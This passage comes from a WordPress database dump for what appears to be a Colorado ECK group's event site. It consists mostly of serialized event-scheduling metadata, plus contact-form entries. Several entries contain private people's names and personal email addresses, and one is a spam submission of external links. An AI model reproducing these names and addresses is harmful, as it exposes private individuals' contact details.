ecurrenceQueue\";i:1611953569;}'),(129943,263593,'boldgrid_hide_page_title','0'),(129944,263593,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"6\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-16\";s:14:\"EventStartDate\";s:19:\"2021-02-20 16:00:00\";s:12:\"EventEndDate\";s:19:\"2021-02-20 17:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(129945,263593,'_EventShowMapLink','1'),(129946,263593,'_EventShowMap','1'),(129947,263593,'_EventCurrencySymbol',''),(129948,263593,'_EventCurrencyPosition','prefix'),(129949,263593,'_EventCost',''),(129950,263593,'_EventURL',''),(129438,263595,'_EventEndDateUTC','2021-08-21 23:00:00'),(129439,263595,'_EventDuration','3600'),(129402,263594,'_EventStartDate','2021-07-17 16:00:00'),(129403,263594,'_EventStartDateUTC','2021-07-17 22:00:00'),(129404,263594,'_EventEndDate','2021-07-17 17:00:00'),(129765,263608,'_EventTimezone','America/Denver'),(129405,263594,'_EventEndDateUTC','2021-07-17 23:00:00'),(129406,263594,'_EventDuration','3600'),(146788,265639,'passster_activate_protection',NULL),(31654,225135,'_tribe_modified_fields','a:32:{s:12:\"_EventOrigin\";i:1576679616;s:13:\"_thumbnail_id\";i:1576679616;s:24:\"boldgrid_hide_page_title\";i:1576679616;s:16:\"_EventRecurrence\";i:1606922758;s:17:\"_EventShowMapLink\";i:1576679616;s:13:\"_EventShowMap\";i:1576679616;s:13:\"_EventVenueID\";i:1576679616;s:15:\"_EventStartDate\";i:1576679770;s:13:\"_EventEndDate\";i:1576679770;s:18:\"_EventStartDateUTC\";i:1576679770;s:16:\"_EventEndDateUTC\";i:1576679770;s:14:\"_EventDuration\";i:1576679616;s:20:\"_EventCurrencySymbol\";i:1576679616;s:22:\"_EventCurrencyPosition\";i:1576679616;s:10:\"_EventCost\";i:1576679616;s:9:\"_EventURL\";i:1576679616;s:14:\"_EventTimezone\";i:1576679616;s:18:\"_EventTimezoneAbbr\";i:1576679616;s:12:\"_dp_original\";i:1576679616;s:16:\"tribe_events_cat\";i:1576704816;s:10:\"_edit_last\";i:1576679688;s:10:\"post_title\";i:1576679799;s:12:\"post_content\";i:1576679770;s:11:\"post_status\";i:1576679770;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922768;s:16:\"protect_children\";i:1606922758;s:26:\"_RTECregistrationsDisabled\";i:1606922758;s:17:\"_RTECdeadlineType\";i:1606922758;s:19:\"_RTECwhoCanRegister\";i:1606922758;s:23:\"_RTEClimitRegistrations\";i:1606922758;s:21:\"_RTECmaxRegistrations\";i:1606922758;s:22:\"_EventHideFromUpcoming\";i:1606922758;}'),(31660,225135,'_EventShowMapLink','1'),(31661,225135,'_EventShowMap','1'),(31662,225135,'_EventVenueID','51976'),(31663,225135,'_EventStartDate','2019-11-03 09:00:00'),(31655,225135,'_tribe_modified_fields','a:32:{s:12:\"_EventOrigin\";i:1576679616;s:13:\"_thumbnail_id\";i:1576679616;s:24:\"boldgrid_hide_page_title\";i:1576679616;s:16:\"_EventRecurrence\";i:1606922758;s:17:\"_EventShowMapLink\";i:1576679616;s:13:\"_EventShowMap\";i:1576679616;s:13:\"_EventVenueID\";i:1576679616;s:15:\"_EventStartDate\";i:1576679770;s:13:\"_EventEndDate\";i:1576679770;s:18:\"_EventStartDateUTC\";i:1576679770;s:16:\"_EventEndDateUTC\";i:1576679770;s:14:\"_EventDuration\";i:1576679616;s:20:\"_EventCurrencySymbol\";i:1576679616;s:22:\"_EventCurrencyPosition\";i:1576679616;s:10:\"_EventCost\";i:1576679616;s:9:\"_EventURL\";i:1576679616;s:14:\"_EventTimezone\";i:1576679616;s:18:\"_EventTimezoneAbbr\";i:1576679616;s:12:\"_dp_original\";i:1576679616;s:16:\"tribe_events_cat\";i:1576704816;s:10:\"_edit_last\";i:1576679688;s:10:\"post_title\";i:1576679799;s:12:\"post_content\";i:1576679770;s:11:\"post_status\";i:1576679770;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922768;s:16:\"protect_children\";i:1606922758;s:26:\"_RTECregistrationsDisabled\";i:1606922758;s:17:\"_RTECdeadlineType\";i:1606922758;s:19:\"_RTECwhoCanRegister\";i:1606922758;s:23:\"_RTEClimitRegistrations\";i:1606922758;s:21:\"_RTECmaxRegistrations\";i:1606922758;s:22:\"_EventHideFromUpcoming\";i:1606922758;}'),(31659,225135,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(103693,225135,'_EventHideFromUpcoming','yes'),(31664,225135,'_EventEndDate','2019-11-03 10:15:00'),(31656,225135,'_tribe_modified_fields','a:32:{s:12:\"_EventOrigin\";i:1576679616;s:13:\"_thumbnail_id\";i:1576679616;s:24:\"boldgrid_hide_page_title\";i:1576679616;s:16:\"_EventRecurrence\";i:1606922758;s:17:\"_EventShowMapLink\";i:1576679616;s:13:\"_EventShowMap\";i:1576679616;s:13:\"_EventVenueID\";i:1576679616;s:15:\"_EventStartDate\";i:1576679770;s:13:\"_EventEndDate\";i:1576679770;s:18:\"_EventStartDateUTC\";i:1576679770;s:16:\"_EventEndDateUTC\";i:1576679770;s:14:\"_EventDuration\";i:1576679616;s:20:\"_EventCurrencySymbol\";i:1576679616;s:22:\"_EventCurrencyPosition\";i:1576679616;s:10:\"_EventCost\";i:1576679616;s:9:\"_EventURL\";i:1576679616;s:14:\"_EventTimezone\";i:1576679616;s:18:\"_EventTimezoneAbbr\";i:1576679616;s:12:\"_dp_original\";i:1576679616;s:16:\"tribe_events_cat\";i:1576704816;s:10:\"_edit_last\";i:1576679688;s:10:\"post_title\";i:1576679799;s:12:\"post_content\";i:1576679770;s:11:\"post_status\";i:1576679770;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922768;s:16:\"protect_children\";i:1606922758;s:26:\"_RTECregistrationsDisabled\";i:1606922758;s:17:\"_RTECdeadlineType\";i:1606922758;s:19:\"_RTECwhoCanRegister\";i:1606922758;s:23:\"_RTEClimitRegistrations\";i:1606922758;s:21:\"_RTECmaxRegistrations\";i:1606922758;s:22:\"_EventHideFromUpcoming\";i:1606922758;}'),(31658,225135,'boldgrid_hide_page_title','1'),(31665,225135,'_EventStartDateUTC','2019-11-03 16:00:00'),(31666,225135,'_EventEndDateUTC','2019-11-03 17:15:00'),(31667,225135,'_EventDuration','4500'),(31668,225135,'_EventCurrencySymbol',''),(31669,225135,'_EventCurrencyPosition','prefix'),(31670,225135,'_EventCost',''),(31671,225135,'_EventURL',''),(31672,225135,'_EventTimezone','America/Denver'),(31673,225135,'_EventTimezoneAbbr','MST'),(31675,225135,'_dp_original','225018'),(31676,225135,'_edit_lock','1606947828:2'),(31677,225135,'_edit_last','2'),(32866,225321,'_EventOrigin','events-calendar'),(32867,225321,'_tribe_modified_fields','a:33:{s:12:\"_EventOrigin\";i:1576679826;s:13:\"_thumbnail_id\";i:1576679826;s:24:\"boldgrid_hide_page_title\";i:1576679826;s:16:\"_EventRecurrence\";i:1606922560;s:17:\"_EventShowMapLink\";i:1576679826;s:13:\"_EventShowMap\";i:1576679826;s:13:\"_EventVenueID\";i:1576679826;s:15:\"_EventStartDate\";i:1576680733;s:13:\"_EventEndDate\";i:1576680733;s:18:\"_EventStartDateUTC\";i:1576680733;s:16:\"_EventEndDateUTC\";i:1576680733;s:14:\"_EventDuration\";i:1576680733;s:20:\"_EventCurrencySymbol\";i:1576679826;s:22:\"_EventCurrencyPosition\";i:1576679826;s:10:\"_EventCost\";i:1576679826;s:9:\"_EventURL\";i:1576679826;s:14:\"_EventTimezone\";i:1576679826;s:18:\"_EventTimezoneAbbr\";i:1576679826;s:12:\"_dp_original\";i:1576679827;s:16:\"tribe_events_cat\";i:1576705027;s:10:\"_edit_last\";i:1576679897;s:10:\"post_title\";i:1576680733;s:12:\"post_content\";i:1576680733;s:11:\"post_status\";i:1576679910;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922572;s:27:\"_EventNextPendingRecurrence\";i:1579284652;s:16:\"protect_children\";i:1606922560;s:26:\"_RTECregistrationsDisabled\";i:1606922560;s:17:\"_RTECdeadlineType\";i:1606922560;s:19:\"_RTECwhoCanRegister\";i:1606922560;s:23:\"_RTEClimitRegistrations\";i:1606922560;s:21:\"_RTECmaxRegistrations\";i:1606922560;s:22:\"_EventHideFromUpcoming\";i:1606922560;}'),(32868,225321,'_EventOrigin','events-calendar'),(32869,225321,'_EventOrigin','events-calendar'),(32870,225321,'_EventOrigin','events-calendar'),(32871,225321,'_EventOrigin','events-calendar'),(32872,225321,'_tribe_modified_fields','a:33:{s:12:\"_EventOrigin\";i:1576679826;s:13:\"_thumbnail_id\";i:1576679826;s:24:\"boldgrid_hide_page_title\";i:1576679826;s:16:\"_EventRecurrence\";i:1606922560;s:17:\"_EventShowMapLink\";i:1576679826;s:13:\"_EventShowMap\";i:1576679826;s:13:\"_EventVenueID\";i:1576679826;s:15:\"_EventStartDate\";i:1576680733;s:13:\"_EventEndDate\";i:1576680733;s:18:\"_EventStartDateUTC\";i:1576680733;s:16:\"_EventEndDateUTC\";i:1576680733;s:14:\"_EventDuration\";i:1576680733;s:20:\"_EventCurrencySymbol\";i:1576679826;s:22:\"_EventCurrencyPosition\";i:1576679826;s:10:\"_EventCost\";i:1576679826;s:9:\"_EventURL\";i:1576679826;s:14:\"_EventTimezone\";i:1576679826;s:18:\"_EventTimezoneAbbr\";i:1576679826;s:12:\"_dp_original\";i:1576679827;s:16:\"tribe_events_cat\";i:1576705027;s:10:\"_edit_last\";i:1576679897;s:10:\"post_title\";i:1576680733;s:12:\"post_content\";i:1576680733;s:11:\"post_status\";i:1576679910;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922572;s:27:\"_EventNextPendingRecurrence\";i:1579284652;s:16:\"protect_children\";i:1606922560;s:26:\"_RTECregistrationsDisabled\";i:1606922560;s:17:\"_RTECdeadlineType\";i:1606922560;s:19:\"_RTECwhoCanRegister\";i:1606922560;s:23:\"_RTEClimitRegistrations\";i:1606922560;s:21:\"_RTECmaxRegistrations\";i:1606922560;s:22:\"_EventHideFromUpcoming\";i:1606922560;}'),(32880,225321,'_EventShowMap','1'),(32889,225321,'_EventCost',''),(93723,7160,'passster_activate_protection',''),(93724,7160,'passster_protection_type','password'),(93722,261720,'_edit_lock','1594089198:2'),(93725,261644,'_edit_lock','1594212736:2'),(94076,261743,'_field_133','Laura'),(94077,261743,'_field_134','Grady'),(94078,261743,'_field_135','laurajgrady@gmail.com'),(94079,261743,'_field_137','Central Colorado Newsletter'),(94080,261743,'_field_138','Hi, I am a new Chela in the Denver area and signed up some time ago to receive the newsletter.  Has  there been a newsletter sent since May?  \n\nI am also interested in taking a class for Discourse 1 and perhaps a book discussions, but I don\'t see any new offerings for classes or ways to sign up.   I know with Covid the \"in person gatherings\" are not taking place, however, I also know that there are classes currently going on via Zoom and Telephone.  \n\nPlease let me know what the plans are for new classes and if you are sending out newsletters via email or what.\n\nThank you,\nLaura'),(96952,262280,'_form_id','13'),(96953,262280,'_seq_num','59'),(96951,262280,'_field_138','https://www.satanisgod.org/www.angelfire.com/empire/serpentis666/Satanic_Meditation.html . https://www.satanisgod.org/www.angelfire.com/empire/serpentis666/Satanic_Magick.html'),(96933,262278,'_field_134','Stevens'),(96934,262278,'_field_135','CATESTEVENS8@GMAIL.COM'),(96935,262278,'_field_137','Thank YOU!'),(96936,262278,'_field_138','Thanking everyone for a beautiful Light &amp; Sound Service!  Such a co-workership of Love!\n\nMuch Love,\n\nCate'),(96937,262278,'_form_id','13'),(96938,262278,'_seq_num','58'),(96066,262151,'_field_224','Randhir'),(96067,262151,'_field_225','Singh'),(96068,262151,'_field_226','randhir4love@gmail.com'),(96069,262151,'_field_227','CA'),(96070,262151,'_field_228','US'),(96071,262151,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(32896,225321,'_edit_last','2'),(160556,266604,'mec_hourly_schedules','a:0:{}'),(160555,266604,'mec_not_in_days',''),(160554,266604,'mec_in_days',''),(96950,262280,'_field_137','https://www.satanisgod.org/www.angelfire.com/empire/serpentis666/Satanic_Magick.html . https://www.satanisgod.org/www.angelfire.com/empire/serpentis666/Satanic_Meditation.html'),(32895,225321,'_edit_lock','1606947629:2'),(32894,225321,'_dp_original','225135'),(32892,225321,'_EventTimezoneAbbr','MST'),(32891,225321,'_EventTimezone','America/Denver'),(32890,225321,'_EventURL',''),(32884,225321,'_EventStartDateUTC','2020-02-16 16:00:00'),(32885,225321,'_EventEndDateUTC','2020-02-17 05:10:00'),(32875,225321,'_tribe_modified_fields','a:33:{s:12:\"_EventOrigin\";i:1576679826;s:13:\"_thumbnail_id\";i:1576679826;s:24:\"boldgrid_hide_page_title\";i:1576679826;s:16:\"_EventRecurrence\";i:1606922560;s:17:\"_EventShowMapLink\";i:1576679826;s:13:\"_EventShowMap\";i:1576679826;s:13:\"_EventVenueID\";i:1576679826;s:15:\"_EventStartDate\";i:1576680733;s:13:\"_EventEndDate\";i:1576680733;s:18:\"_EventStartDateUTC\";i:1576680733;s:16:\"_EventEndDateUTC\";i:1576680733;s:14:\"_EventDuration\";i:1576680733;s:20:\"_EventCurrencySymbol\";i:1576679826;s:22:\"_EventCurrencyPosition\";i:1576679826;s:10:\"_EventCost\";i:1576679826;s:9:\"_EventURL\";i:1576679826;s:14:\"_EventTimezone\";i:1576679826;s:18:\"_EventTimezoneAbbr\";i:1576679826;s:12:\"_dp_original\";i:1576679827;s:16:\"tribe_events_cat\";i:1576705027;s:10:\"_edit_last\";i:1576679897;s:10:\"post_title\";i:1576680733;s:12:\"post_content\";i:1576680733;s:11:\"post_status\";i:1576679910;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922572;s:27:\"_EventNextPendingRecurrence\";i:1579284652;s:16:\"protect_children\";i:1606922560;s:26:\"_RTECregistrationsDisabled\";i:1606922560;s:17:\"_RTECdeadlineType\";i:1606922560;s:19:\"_RTECwhoCanRegister\";i:1606922560;s:23:\"_RTEClimitRegistrations\";i:1606922560;s:21:\"_RTECmaxRegistrations\";i:1606922560;s:22:\"_EventHideFromUpcoming\";i:1606922560;}'),(32881,225321,'_EventVenueID','51976'),(32882,225321,'_EventStartDate','2020-02-16 09:00:00'),(32874,225321,'_tribe_modified_fields','a:33:{s:12:\"_EventOrigin\";i:1576679826;s:13:\"_thumbnail_id\";i:1576679826;s:24:\"boldgrid_hide_page_title\";i:1576679826;s:16:\"_EventRecurrence\";i:1606922560;s:17:\"_EventShowMapLink\";i:1576679826;s:13:\"_EventShowMap\";i:1576679826;s:13:\"_EventVenueID\";i:1576679826;s:15:\"_EventStartDate\";i:1576680733;s:13:\"_EventEndDate\";i:1576680733;s:18:\"_EventStartDateUTC\";i:1576680733;s:16:\"_EventEndDateUTC\";i:1576680733;s:14:\"_EventDuration\";i:1576680733;s:20:\"_EventCurrencySymbol\";i:1576679826;s:22:\"_EventCurrencyPosition\";i:1576679826;s:10:\"_EventCost\";i:1576679826;s:9:\"_EventURL\";i:1576679826;s:14:\"_EventTimezone\";i:1576679826;s:18:\"_EventTimezoneAbbr\";i:1576679826;s:12:\"_dp_original\";i:1576679827;s:16:\"tribe_events_cat\";i:1576705027;s:10:\"_edit_last\";i:1576679897;s:10:\"post_title\";i:1576680733;s:12:\"post_content\";i:1576680733;s:11:\"post_status\";i:1576679910;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922572;s:27:\"_EventNextPendingRecurrence\";i:1579284652;s:16:\"protect_children\";i:1606922560;s:26:\"_RTECregistrationsDisabled\";i:1606922560;s:17:\"_RTECdeadlineType\";i:1606922560;s:19:\"_RTECwhoCanRegister\";i:1606922560;s:23:\"_RTEClimitRegistrations\";i:1606922560;s:21:\"_RTECmaxRegistrations\";i:1606922560;s:22:\"_EventHideFromUpcoming\";i:1606922560;}'),(32883,225321,'_EventEndDate','2020-02-16 22:10:00'),(32877,225321,'boldgrid_hide_page_title','1'),(32879,225321,'_EventShowMapLink','1'),(32873,225321,'_tribe_modified_fields','a:33:{s:12:\"_EventOrigin\";i:1576679826;s:13:\"_thumbnail_id\";i:1576679826;s:24:\"boldgrid_hide_page_title\";i:1576679826;s:16:\"_EventRecurrence\";i:1606922560;s:17:\"_EventShowMapLink\";i:1576679826;s:13:\"_EventShowMap\";i:1576679826;s:13:\"_EventVenueID\";i:1576679826;s:15:\"_EventStartDate\";i:1576680733;s:13:\"_EventEndDate\";i:1576680733;s:18:\"_EventStartDateUTC\";i:1576680733;s:16:\"_EventEndDateUTC\";i:1576680733;s:14:\"_EventDuration\";i:1576680733;s:20:\"_EventCurrencySymbol\";i:1576679826;s:22:\"_EventCurrencyPosition\";i:1576679826;s:10:\"_EventCost\";i:1576679826;s:9:\"_EventURL\";i:1576679826;s:14:\"_EventTimezone\";i:1576679826;s:18:\"_EventTimezoneAbbr\";i:1576679826;s:12:\"_dp_original\";i:1576679827;s:16:\"tribe_events_cat\";i:1576705027;s:10:\"_edit_last\";i:1576679897;s:10:\"post_title\";i:1576680733;s:12:\"post_content\";i:1576680733;s:11:\"post_status\";i:1576679910;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922572;s:27:\"_EventNextPendingRecurrence\";i:1579284652;s:16:\"protect_children\";i:1606922560;s:26:\"_RTECregistrationsDisabled\";i:1606922560;s:17:\"_RTECdeadlineType\";i:1606922560;s:19:\"_RTECwhoCanRegister\";i:1606922560;s:23:\"_RTEClimitRegistrations\";i:1606922560;s:21:\"_RTECmaxRegistrations\";i:1606922560;s:22:\"_EventHideFromUpcoming\";i:1606922560;}'),(32878,225321,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(103440,225321,'_EventHideFromUpcoming','yes'),(32887,225321,'_EventCurrencySymbol',''),(32886,225321,'_EventDuration','47400'),(32888,225321,'_EventCurrencyPosition','prefix'),(73136,225321,'_EventNextPendingRecurrence','2022-02-20 09:00:00'),(35829,225693,'_VenueOrigin','events-calendar'),(35830,225693,'_tribe_modified_fields','a:19:{s:12:\"_VenueOrigin\";i:1576681004;s:10:\"_edit_last\";i:1576681034;s:10:\"post_title\";i:1576681107;s:11:\"post_status\";i:1576681173;s:17:\"_EventShowMapLink\";i:1576681173;s:13:\"_EventShowMap\";i:1576681173;s:17:\"_VenueShowMapLink\";i:1576681173;s:13:\"_VenueShowMap\";i:1576681173;s:13:\"_VenueAddress\";i:1576681173;s:10:\"_VenueCity\";i:1576681173;s:13:\"_VenueCountry\";i:1576681173;s:14:\"_VenueProvince\";i:1576681173;s:11:\"_VenueState\";i:1576681173;s:9:\"_VenueZip\";i:1576681173;s:11:\"_VenuePhone\";i:1576681173;s:9:\"_VenueURL\";i:1576681173;s:19:\"_VenueStateProvince\";i:1576681173;s:21:\"_VenueOverwriteCoords\";i:1576681173;s:24:\"boldgrid_hide_page_title\";i:1576681174;}'),(35831,225693,'_edit_lock','1576706311:2'),(35832,225693,'_edit_last','2'),(151808,266081,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-12-21\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-12-21\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(117146,262885,'_RTECregistrationsDisabled','1'),(117147,262885,'_RTECdeadlineType','start'),(117148,262885,'_RTECwhoCanRegister','any'),(117149,262885,'_RTEClimitRegistrations','0'),(117150,262885,'_RTECmaxRegistrations','30'),(117151,262885,'boldgrid_hide_page_title','0'),(117152,262885,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 12:15:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 13:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117153,262885,'_EventShowMapLink','1'),(117154,262885,'_EventShowMap','1'),(117155,262885,'_EventVenueID','262507'),(117156,262885,'_EventCurrencySymbol',''),(117157,262885,'_EventCurrencyPosition','prefix'),(117158,262885,'_EventCost',''),(117159,262885,'_EventURL',''),(117160,262885,'_EventTimezone','America/Denver'),(117161,262885,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610280900;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1613304900;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1615724100;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1618143300;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1620562500;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1623586500;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1626005700;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1628424900;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1631448900;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1633868100;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(117220,262887,'_EventTimezone','America/Denver'),(117217,262887,'_EventCurrencyPosition','prefix'),(117172,262886,'protect_children',''),(117166,262886,'_EventStartDate','2021-04-11 12:15:00'),(117219,262887,'_EventURL',''),(117167,262886,'_EventStartDateUTC','2021-04-11 18:15:00'),(117168,262886,'_EventEndDate','2021-04-11 13:45:00'),(117218,262887,'_EventCost',''),(117169,262886,'_EventEndDateUTC','2021-04-11 19:45:00'),(117170,262886,'_EventDuration','5400'),(117171,262886,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512443;s:12:\"_EventOrigin\";i:1607512443;s:16:\"protect_children\";i:1607512443;s:13:\"_thumbnail_id\";i:1607512443;s:26:\"_RTECregistrationsDisabled\";i:1607512443;s:17:\"_RTECdeadlineType\";i:1607512443;s:19:\"_RTECwhoCanRegister\";i:1607512443;s:23:\"_RTEClimitRegistrations\";i:1607512443;s:21:\"_RTECmaxRegistrations\";i:1607512443;s:16:\"_EventRecurrence\";i:1607512443;s:17:\"_EventShowMapLink\";i:1607512443;s:13:\"_EventShowMap\";i:1607512443;s:13:\"_EventVenueID\";i:1607512443;s:20:\"_EventCurrencySymbol\";i:1607512443;s:22:\"_EventCurrencyPosition\";i:1607512443;s:10:\"_EventCost\";i:1607512443;s:9:\"_EventURL\";i:1607512443;s:14:\"_EventTimezone\";i:1607512443;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512443;s:16:\"tribe_events_cat\";i:1607537643;}'),(117173,262886,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512443;s:12:\"_EventOrigin\";i:1607512443;s:16:\"protect_children\";i:1607512443;s:13:\"_thumbnail_id\";i:1607512443;s:26:\"_RTECregistrationsDisabled\";i:1607512443;s:17:\"_RTECdeadlineType\";i:1607512443;s:19:\"_RTECwhoCanRegister\";i:1607512443;s:23:\"_RTEClimitRegistrations\";i:1607512443;s:21:\"_RTECmaxRegistrations\";i:1607512443;s:16:\"_EventRecurrence\";i:1607512443;s:17:\"_EventShowMapLink\";i:1607512443;s:13:\"_EventShowMap\";i:1607512443;s:13:\"_EventVenueID\";i:1607512443;s:20:\"_EventCurrencySymbol\";i:1607512443;s:22:\"_EventCurrencyPosition\";i:1607512443;s:10:\"_EventCost\";i:1607512443;s:9:\"_EventURL\";i:1607512443;s:14:\"_EventTimezone\";i:1607512443;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512443;s:16:\"tribe_events_cat\";i:1607537643;}'),(117176,262886,'_RTECregistrationsDisabled','1'),(117177,262886,'_RTECdeadlineType','start'),(117178,262886,'_RTECwhoCanRegister','any'),(117179,262886,'_RTEClimitRegistrations','0'),(117180,262886,'_RTECmaxRegistrations','30'),(117174,262886,'_EventOrigin','events-calendar'),(117181,262886,'boldgrid_hide_page_title','0'),(117182,262886,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 12:15:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 13:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117183,262886,'_EventShowMapLink','1'),(117184,262886,'_EventShowMap','1'),(117185,262886,'_EventVenueID','262507'),(117186,262886,'_EventCurrencySymbol',''),(117187,262886,'_EventCurrencyPosition','prefix'),(117188,262886,'_EventCost',''),(117189,262886,'_EventURL',''),(117190,262886,'_EventTimezone','America/Denver'),(117191,262886,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610280900;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1613304900;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1615724100;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1618143300;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1620562500;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1623586500;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1626005700;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1628424900;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1631448900;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1633868100;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(117216,262887,'_EventCurrencySymbol',''),(117214,262887,'_EventShowMap','1'),(117202,262887,'protect_children',''),(117196,262887,'_EventStartDate','2021-05-09 12:15:00'),(117197,262887,'_EventStartDateUTC','2021-05-09 18:15:00'),(117215,262887,'_EventVenueID','262507'),(117198,262887,'_EventEndDate','2021-05-09 13:45:00'),(117199,262887,'_EventEndDateUTC','2021-05-09 19:45:00'),(117200,262887,'_EventDuration','5400'),(117201,262887,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512443;s:12:\"_EventOrigin\";i:1607512443;s:16:\"protect_children\";i:1607512443;s:13:\"_thumbnail_id\";i:1607512443;s:26:\"_RTECregistrationsDisabled\";i:1607512443;s:17:\"_RTECdeadlineType\";i:1607512443;s:19:\"_RTECwhoCanRegister\";i:1607512443;s:23:\"_RTEClimitRegistrations\";i:1607512443;s:21:\"_RTECmaxRegistrations\";i:1607512443;s:16:\"_EventRecurrence\";i:1607512443;s:17:\"_EventShowMapLink\";i:1607512443;s:13:\"_EventShowMap\";i:1607512443;s:13:\"_EventVenueID\";i:1607512443;s:20:\"_EventCurrencySymbol\";i:1607512443;s:22:\"_EventCurrencyPosition\";i:1607512443;s:10:\"_EventCost\";i:1607512443;s:9:\"_EventURL\";i:1607512443;s:14:\"_EventTimezone\";i:1607512443;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512443;s:16:\"tribe_events_cat\";i:1607537643;}'),(117203,262887,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512443;s:12:\"_EventOrigin\";i:1607512443;s:16:\"protect_children\";i:1607512443;s:13:\"_thumbnail_id\";i:1607512443;s:26:\"_RTECregistrationsDisabled\";i:1607512443;s:17:\"_RTECdeadlineType\";i:1607512443;s:19:\"_RTECwhoCanRegister\";i:1607512443;s:23:\"_RTEClimitRegistrations\";i:1607512443;s:21:\"_RTECmaxRegistrations\";i:1607512443;s:16:\"_EventRecurrence\";i:1607512443;s:17:\"_EventShowMapLink\";i:1607512443;s:13:\"_EventShowMap\";i:1607512443;s:13:\"_EventVenueID\";i:1607512443;s:20:\"